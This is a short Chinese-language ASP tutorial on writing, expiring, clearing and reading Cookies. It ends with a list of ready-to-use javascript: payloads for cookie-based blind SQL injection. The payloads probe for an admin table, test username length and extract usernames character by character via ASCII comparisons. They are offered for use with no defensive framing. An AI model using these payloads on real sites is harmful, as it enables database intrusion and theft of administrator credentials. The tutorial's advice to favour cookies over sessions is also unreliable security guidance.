1.如何写入Cookies? Response.Cookies('字段名')=变量或字符串,例如: Response.Cookies('name2')='Dingdang' ------------------------------------------- 2.如何设置Cookies时间? Response.Cookies('字段名').expires=时间函数+N,例如: Response.Cookies('name2').expires=date+1,表示Cookies保存1天,再比如: Response.Cookies('name2').expires=Hour+8,表示Cookies保存8小时。 ---------------------------------------------------------------- 3.在以往的ASP教程中,很少有介绍Cookies退出的方法。在“退出”这个ASP页中可以这样写: Response.Cookies('字段名')='' 之后,在客户端的浏览器就清除了Cookies,并且Cookies文件会消失。注意有多少个字段,就要写多少句来清除。 -------------------------------------------------- 4.如何读取Cookies? 变量名=Request.Cookies('字段名'),例如: name2=Request.Cookies('name2') 如果网页中写入<%=name2%>这句,则会显示“Dingdang”。 也可以这样直接读取Cookies,<%=Request.Cookies('name2')%> --------------------------------------------- Cookies是属于Session对象的一种。但有不同,Cookies不会占服务器资源;而“Session”则会占用服务器资源。所以,尽量不要使用Session,而使用Cookies。 -------------------------------- 指令: -------------------------------- javascript:alert(document.cookie='id='+escape('156 and 1=1')); javascript:alert(document.cookie='id='+escape('26 and (select count(*) from admin)>0')); //猜是否有admin表 javascript:alert(document.cookie='id='+escape('26 and (select count(username) from admin)>0')); //猜是否有username表 javascript:alert(document.cookie='id='+escape('40 and (select len(username) from admin)=5')); //看管理员密码是否是5位 javascript:alert(document.cookie='id='+escape('26 and (select top 1 asc(mid(username,1,1)) from admin)=97')); //第一位是否是ASC码97,相当于a javascript:alert(document.cookie='targetID='+escape('108 and (select top 1 unicode(substring(user,3,1)) from admin)=111')); javascript:alert(document.cookie='id='+escape('26 and (select top 1 asc(mid(username,2,1)) from admin)=97')); //第二位 javascript:alert(document.cookie='targetID='+escape('108 and (select count(*) from msysobjects)>0')); //看系统表 |
|